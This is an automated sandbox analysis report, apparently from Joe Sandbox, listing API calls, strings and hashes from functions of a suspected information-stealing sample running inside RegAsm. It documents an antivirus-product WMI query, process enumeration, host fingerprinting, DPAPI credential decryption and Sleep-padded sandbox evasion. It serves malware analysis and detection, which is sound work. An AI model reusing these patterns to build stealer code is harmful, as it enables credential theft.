                                                    • Opcode ID: 76a1c85f89ad633929d7a557d3b25c77216541363ec811c58dfad368e400959b
                                                    • Instruction ID: c4308a2caa8b1ba3aa82c01ce2af689c6af017e77cc8bc3ac5f3919b57d2ddb8
                                                    • Opcode Fuzzy Hash: 76a1c85f89ad633929d7a557d3b25c77216541363ec811c58dfad368e400959b
                                                    • Instruction Fuzzy Hash: 0CF1D271E083128FDB148F29C98479B77E5AF84726F000969FA86C6381E73EE454DB92
                                                    Function 004129BF Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 142comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory,00000000,?,00428E48,00000000), ref: 004129E9
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4), ref: 00412A01
                                                    • CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000,?), ref: 00412A1D
                                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,Windows: ,00000000,?,00428FE4,00000000), ref: 00412A65
                                                    • VariantInit.OLEAUT32(?), ref: 00412AC6
                                                    • VariantClear.OLEAUT32(?), ref: 00412AFC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeVariant$BlanketClearCreateInitInstanceProxySecurity
                                                    • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                                    • API String ID: 3243281124-2561087649
                                                    • Opcode ID: 01e7d32d45ff0252796b17b99a1afcd933ba27ea36f00a65b271f1c55a8e973d
                                                    • Instruction ID: cc2f9b12050fb50489b4dacd928ba9f1606622a753a49b6d6fc2a760caa5f7a5
                                                    • Opcode Fuzzy Hash: 01e7d32d45ff0252796b17b99a1afcd933ba27ea36f00a65b271f1c55a8e973d
                                                    • Instruction Fuzzy Hash: 01512971A44208AFEB10CF94DD46FEDBBB8EB08711F604116F611FA1E0C7B8A951CB69
                                                    Function 004138BA Relevance: 7.6, APIs: 5, Instructions: 51processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004138F5
                                                    • Process32First.KERNEL32(00429888,00000128), ref: 00413908
                                                    • Process32Next.KERNEL32(00429888,00000128), ref: 0041391C
                                                    • StrCmpCA.SHLWAPI(?,0042988C), ref: 00413930
                                                    • FindCloseChangeNotification.KERNEL32(00429888), ref: 00413943
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3243318325-0
                                                    • Opcode ID: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
                                                    • Instruction ID: c76ae2ebba4cdfdbec52cc22ef4db84e697ee2aab148ee9ae3442f35c02f241c
                                                    • Opcode Fuzzy Hash: 2a4b200a08ed556fe0b76f61f99fc73be8100933646605b45de0898bc31b2ca7
                                                    • Instruction Fuzzy Hash: 2B11C2B5900249EFDF118F91CD09BEFBBBDFB06791F00016AE505A62A0D7B88B40CB65
                                                    Function 0041246A Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412491
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004124A4
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004124B8
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • CloseHandle.KERNEL32(00000000), ref: 00412525
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1066202413-0
                                                    • Opcode ID: 977ae0b600e9dfa5c8bb5876995a90588de119cf502625faec0d1e404a198b9a
                                                    • Instruction ID: 2c0229d212547161a0eb93f3d0d5d82303ca8f07f9ab92fbeb1aaa96aca691bd
                                                    • Opcode Fuzzy Hash: 977ae0b600e9dfa5c8bb5876995a90588de119cf502625faec0d1e404a198b9a
                                                    • Instruction Fuzzy Hash: CC212935900118EBCB11EB60DD56AEDB379AF15309F5041EAA60AB61A0EF349FC8CF94
                                                    Function 00411CBF Relevance: 6.0, APIs: 4, Instructions: 31memorytimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00428E48,00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00428E48,00000000,?,00000000,00000000), ref: 00411CCF
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411CD6
                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00411CE9
                                                    • wsprintfA.USER32 ref: 00411D20
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                    • String ID:
                                                    • API String ID: 362916592-0
                                                    • Opcode ID: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
                                                    • Instruction ID: daf70193e9c0513ecb3072794c83a438d37f7fdfa3376bc861271b49892c1553
                                                    • Opcode Fuzzy Hash: 203e413fed742de3b00b513deca226d0cff61aa8e2789412112a4631cc96891a
                                                    • Instruction Fuzzy Hash: 2BF0BE70A003289FDB20AB24FC0AB9977BBBB02345F1001D5F209AA2E0D7749EC0CF02
                                                    Function 00407E41 Relevance: 4.5, APIs: 3, Instructions: 43memoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407E65
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00407E83
                                                    • LocalFree.KERNEL32(?), ref: 00407EAB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                    • String ID:
                                                    • API String ID: 2068576380-0
                                                    • Opcode ID: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
                                                    • Instruction ID: c73416beba9d1fde4238afde8a7e84a4d4aa4311c1f55aef6ad3ec00fa4115b4
                                                    • Opcode Fuzzy Hash: ec7d2c3964d9433e1bd8db3b7e97589d228e91b9e021ed9bd7c00834a8d4e7c8
                                                    • Instruction Fuzzy Hash: 72019279900209EFCB01DF98D945A9E7BF5FB09300F0000A5F901AB2A0D774AE50DF61
                                                    Function 00411BEC Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041A955), ref: 00411BF8
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0041A955), ref: 00411BFF
                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 00411C16
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocNameProcessUser
                                                    • String ID:
                                                    • API String ID: 1206570057-0
                                                    • Opcode ID: cdb89f3b8d2170a32c4f5d9c7d109af83218dd3f9df08350fd3753d412c9dc7b
                                                    • Instruction ID: 6ad48150bf72aad5a6046b0908b1c33b434ec51fc494a64bf18a9d81697ab1ea
                                                    • Opcode Fuzzy Hash: cdb89f3b8d2170a32c4f5d9c7d109af83218dd3f9df08350fd3753d412c9dc7b
                                                    • Instruction Fuzzy Hash: B3E04CB4A00608FFDB10DBD4DC49FADBBB8FB04749F904065F601E2160D7B45A459B64
                                                    Function 00411F21 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystemwsprintf
                                                    • String ID:
                                                    • API String ID: 2452939696-0
                                                    • Opcode ID: 2f2772df9e2289074dc65a3b003ee837af4eb9d8d63b789a1da4cf5f031d46f7
                                                    • Instruction ID: 9caa33327a18f9dae679d202d2ba32c4f74d5e180e33a6cc9dfb65b88a9d38f3
                                                    • Opcode Fuzzy Hash: 2f2772df9e2289074dc65a3b003ee837af4eb9d8d63b789a1da4cf5f031d46f7
                                                    • Instruction Fuzzy Hash: F6D05EB180011CABCB00DBE0FC499D977BCBB09208F4408B1E614E2040E3B8EAD88BA8
                                                    Function 0041A76B Relevance: 257.6, APIs: 139, Strings: 8, Instructions: 337sleepstringlibraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenW.KERNEL32(Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea), ref: 0041A776
                                                    • lstrlenW.KERNEL32(The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On), ref: 0041A781
                                                    • lstrlenW.KERNEL32(Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l), ref: 0041A78C
                                                    • lstrlenW.KERNEL32(The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia), ref: 0041A797
                                                    • lstrlenW.KERNEL32(I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and), ref: 0041A7A2
                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0041A7AD
                                                    • GetProcAddress.KERNEL32(00000000,Sleep), ref: 0041A7C4
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 0041A7D7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7E4
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7EC
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7F4
                                                    • Sleep.KERNEL32(00000014), ref: 0041A7FC
                                                    • Sleep.KERNEL32(00000014), ref: 0041A804
                                                    • Sleep.KERNEL32(00000014), ref: 0041A80C
                                                    • lstrlenW.KERNEL32(Taxonomic sequence (also known as systematic, phyletic or taxonomic order) is a sequence followed in listing of taxa which aids ea), ref: 0041A817
                                                    • lstrlenW.KERNEL32(The 1999 Rushmoor Council election took place on 6 May 1999 to elect members of Rushmoor Borough Council in Hampshire, England. On), ref: 0041A822
                                                    • lstrlenW.KERNEL32(Oregon Ballot Measure 56 or House Joint Resolution 15 (HJR 15) is a legislatively referred constitutional amendment that enacted l), ref: 0041A82D
                                                    • lstrlenW.KERNEL32(The 1967 October Revolution Parade is the parade on Moscow's Red Square devoted to the 50th anniversary of the Great October Socia), ref: 0041A838
                                                    • lstrlenW.KERNEL32(I-11 was an Imperial Japanese Navy Type A1 submarine that served during World War II. Designed as a submarine aircraft carrier and), ref: 0041A843
                                                    • Sleep.KERNEL32(00000014), ref: 0041A84B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A853
                                                    • Sleep.KERNEL32(00000014), ref: 0041A85B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A863
                                                    • Sleep.KERNEL32(00000014), ref: 0041A86B
                                                    • Sleep.KERNEL32(00000014), ref: 0041A873
                                                    • Sleep.KERNEL32(00000014), ref: 0041A880
                                                    • Sleep.KERNEL32(00000014), ref: 0041A888
                                                    • Sleep.KERNEL32(00000014), ref: 0041A890
                                                    • Sleep.KERNEL32(00000014), ref: 0041A898
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8A0
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8A8
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8B5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8BD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8C5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8CD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8D5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8DD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8E5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8ED
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8F5
                                                    • Sleep.KERNEL32(00000014), ref: 0041A8FD
                                                    • Sleep.KERNEL32(00000014), ref: 0041A905
                                                    • Sleep.KERNEL32(00000014), ref: 0041A90D
                                                    • Sleep.KERNEL32(00000014,00425200), ref: 0041A922
                                                    • Sleep.KERNEL32(00000014), ref: 0041A92A
                                                    • Sleep.KERNEL32(00000014), ref: 0041A932
                                                    • Sleep.KERNEL32(00000014), ref: 0041A93A
                                                    • Sleep.KERNEL32(00000014), ref: 0041A942
                                                    • Sleep.KERNEL32(00000014), ref: 0041A94A
                                                    • Sleep.KERNEL32(00000014,00000000,?,?,00428E5C,?,00000000), ref: 0041A9A6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9AE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9B6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9BE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9C6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9CE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9D6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9DE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9E6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9EE
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9F6
                                                    • Sleep.KERNEL32(00000014), ref: 0041A9FE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA0F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA17
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA1F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA27
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA2F
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA37
                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0041AA4D
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA5E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA66
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA6E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA76
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA7E
                                                    • Sleep.KERNEL32(00000014), ref: 0041AA86
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041AA9B
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAA6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAAE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAB6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AABE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAC6
                                                    • Sleep.KERNEL32(00000014), ref: 0041AACE
                                                    • Sleep.KERNEL32(00000014), ref: 0041AADA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAE2
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAEA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAF2
                                                    • Sleep.KERNEL32(00000014), ref: 0041AAFA
                                                    • Sleep.KERNEL32(00000014), ref: 0041AB02
                                                    • CloseHandle.KERNEL32(00000000), ref: 0041AB0B
                                                    • Sleep.KERNEL32(00001B58), ref: 0041AB16
